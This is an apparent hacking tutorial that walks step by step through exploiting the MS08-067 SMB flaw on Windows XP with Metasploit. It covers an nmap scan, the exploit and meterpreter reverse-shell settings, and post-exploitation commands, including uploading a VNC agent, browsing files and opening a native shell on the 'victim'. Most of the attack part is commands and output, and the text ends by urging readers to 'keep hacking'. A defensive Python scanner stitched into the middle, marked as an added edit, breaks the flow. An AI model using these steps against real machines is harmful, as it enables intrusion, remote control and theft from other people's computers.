Hack Windows XP with Metasploit (MS08-067)

Using Metasploit it is possible to hack Windows XP machines just by using the IP address of the victim machine. It does not involve installing any backdoor or trojan server on the victim machine. Metasploit does this by exploiting a vulnerability in the Windows Server service (SMB, which the post also calls samba) known as MS08-067. This exploit works on Windows XP up to XP SP3.

The vulnerability/exploit module inside Metasploit is:

    Name:   Microsoft Server Service Relative Path Stack Corruption
    Module: exploit/windows/smb/ms08_067_netapi

Further details and references for the vulnerability can be found on the CVE Details page (http://cvedetails...) and in the Microsoft security bulletin MS08-067 (http://www..../ms08-067.mspx).

Note: This exploit is old as of now and will work only if the Windows XP on the target machine is unpatched and not running any firewall. If you were to scan a range of IP addresses to discover online Windows XP machines, most of them would likely be patched (through automatic updates). So if you want to test and practise this exploit, set up a vulnerable, unpatched XP system.

Scan for open ports

Before exploiting the XP machine with Metasploit it is a good idea to scan for open ports using nmap, to confirm that the ports are accessible and accepting connections. Here is a quick example (the scan below is reproduced only partially):

    root@...:~# nmap -n -sV 192.168.1....

    Starting Nmap 6.2... at ... PDT
    Nmap scan report for 192.168.1....
    Host is up (0.0...).
    Not shown: 996 closed ports
    PORT     STATE  SERVICE       VERSION
    .../tcp  open   ...           Microsoft Windows RPC
    445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
    .../tcp  open   ...           Microsoft HTTPAPI httpd 1... (SSDP/UPnP)
    MAC Address: ...:D3:2C:37 (Cadmus Computer Systems)
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Service detection performed. Please report any incorrect results at http://nmap...
    Nmap done: 1 IP address (1 host up) scanned in 7...

Check port number 445. It is running the microsoft-ds (SMB) service. This service is used to share printers and files across the network.
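As a defensive counterpart to the scan above, here is an added example (written for this edit, not code from the original post) that parses the normal output of `nmap -sV` and flags hosts exposing 445/tcp with a banner naming Windows XP, so an inventory scan can turn up unpatched legacy hosts before someone else does. The sample scan output, hosts, ports and banners are constructed; the `LEGACY_OS_RE` pattern also matches the other out-of-support Windows families the MS08-067 bulletin covered, which goes beyond the XP-only case in the post.

```python
import re
from typing import Dict, List

# Constructed sample of `nmap -n -sV` output modelled on the post's scan; hosts,
# ports and banners are made up for this example.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.1.20
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

Nmap scan report for 192.168.1.30
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4 (protocol 2.0)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# port/proto, state, service, then an optional free-text version banner
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# Windows families covered by MS08-067 that are long out of support
LEGACY_OS_RE = re.compile(r"Windows (XP|2000|Server 2003)")

def parse_nmap(text: str) -> Dict[str, List[dict]]:
    """Map each scanned host to its port records from nmap's normal output."""
    hosts: Dict[str, List[dict]] = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            hosts[current].append({"port": int(port), "proto": proto, "state": state,
                                   "service": service, "version": (version or "").strip()})
    return hosts

def legacy_smb_hosts(hosts: Dict[str, List[dict]]) -> List[str]:
    """Hosts with 445/tcp open whose banner names an end-of-life Windows."""
    return [host for host, ports in hosts.items()
            if any(p["port"] == 445 and p["proto"] == "tcp" and p["state"] == "open"
                   and LEGACY_OS_RE.search(p["version"]) for p in ports)]
```

Feed it the saved output of a real `nmap -sV` run over your own address range; any host it returns should be patched or taken off the network.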
It is this service that is vulnerable to the above-mentioned exploit, and it is what gets hacked next using Metasploit.

Exploit using Metasploit

The exploit is quite easy to launch. Start msfconsole and select the exploit with the 'use' command (use exploit/windows/smb/ms08_067_netapi). If you want to read information about the exploit, type 'info' and hit enter. See the options available:

    msf exploit(ms08_067_netapi) > show options

    Module options (exploit/windows/smb/ms08_067_netapi):

       Name     Current Setting  Required  Description
       RHOST                     yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

    Exploit target:

       0   Automatic Targeting

The important option to set is RHOST (Remote Host). This is the IP address of the victim machine that is running the vulnerable Windows XP. In this example the IP address is 192.168.1.... So set the option:

    msf exploit(ms08_067_netapi) > set RHOST 192.168.1....
    RHOST => 192.168.1....

Select the payload

Next comes the payload. The payload is the piece of code that runs along with the exploit and provides the hacker with a reverse shell. We are going to use the Windows meterpreter payload, windows/meterpreter/reverse_tcp. If you want to see all the available payloads, use the 'show payloads' command.

Why meterpreter? Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in. The functionality includes common post-exploitation tasks like scanning the target's network and hardware, accessing devices, etc. Meterpreter can also start a VNC session.

Check options once again

Now that we have selected our payload, it is time to check the options once again.

    Module options (exploit/windows/smb/ms08_067_netapi):

       Name     Current Setting  Required  Description
       RHOST    192.168.1....    yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

    Payload options (windows/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
       LHOST                      yes       The listen address
       LPORT     4444             yes       The listen port

    Exploit target:

       0   Automatic Targeting

Now the options also include the payload options. The important options to set are LHOST and LPORT. LHOST is the IP address of the local (hacker) machine. LPORT is the port number on which the reverse shell listener will receive the incoming shell. So set the correct values:

    msf exploit(ms08_067_netapi) > set LHOST 192.168.1....
    LHOST => 192.168.1....
    msf exploit(ms08_067_netapi) > set LPORT 6666
    LPORT => 6666

Launch the exploit

Now Metasploit is all configured to launch the exploit. Enter 'exploit' and hit enter.

    [*] Started reverse handler on 192.168.1....
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP - Service Pack 3 - lang:English
    [*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (7...
    [*] Meterpreter session 2 opened (1...

If it runs correctly you finally get the meterpreter shell. Type 'help' and hit enter to see what commands are available. Let's try running some of the common commands.

Post exploitation with meterpreter

Get system information

The 'sysinfo' command will get the system information of the victim machine.

    meterpreter > sysinfo
    Computer        : ----------
    OS              : Windows XP (Build 2..., Service Pack 3).
    Architecture    : x...
    System Language : en_US
    Meterpreter     : x...

This shows some basic information about the Windows installation.

Get network information

The 'ipconfig' command will show the network interfaces and their network configuration.

    meterpreter > ipconfig

    Name         : MS TCP Loopback interface
    Hardware MAC : 0...
    MTU          : 1520
    IPv4 Address : 1...
    IPv4 Netmask : 2...

    Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
    Hardware MAC : 0...
    MTU          : 1500
    IPv4 Address : 1...
    IPv4 Netmask : 2...

Start VNC server

If you want a VNC session on the victim machine, run the vnc script.

    meterpreter > run vnc
    [*] Creating a VNC reverse tcp stager: LHOST=192.168.1.... LPORT=4545
    [*] Running payload handler
    [*] VNC stager executable 7... 
    [*] Uploaded the VNC agent to C:\WINDOWS\TEMP\rRlmDx.exe (must be deleted manually)
    [*] Executing the VNC agent with endpoint 1...

It takes a few seconds, and then a window pops up with the remote desktop of the victim machine. Now you can use your mouse to interact with the victim desktop as if it were your own.

Browsing the file system

For browsing the file system there are lots of Linux-style commands:

    Command   Description
    cat       Read the contents of a file to the screen
    cd        Change directory
    download  Download a file or directory
    edit      Edit a file
    getlwd    Print local working directory
    getwd     Print working directory
    lcd       Change local working directory
    lpwd      Print local working directory
    ls        List files
    mkdir     Make directory
    pwd       Print working directory
    rm        Delete the specified file
    rmdir     Remove directory
    search    Search for files
    upload    Upload a file or directory

Get native shell

If you finally want the command prompt style shell on the victim machine, enter 'shell' and hit enter.

    meterpreter > shell
    Process 1328 created.
    Channel 3 created.
    Microsoft Windows XP [Version 5....]
    (C) Copyright 198... Microsoft Corp.

    C:\WINDOWS\system32>

Now it is the Windows command prompt. Play around with it and, when done, type 'exit' and press enter. It will come back to the meterpreter session.

Next

The meterpreter commands shown above were just the basic commands of meterpreter. Meterpreter has lots of inbuilt scripts that can do many other things on the victim machine. We shall check them out in some other post. So keep hacking till then.

Last Updated On : 8th May 2...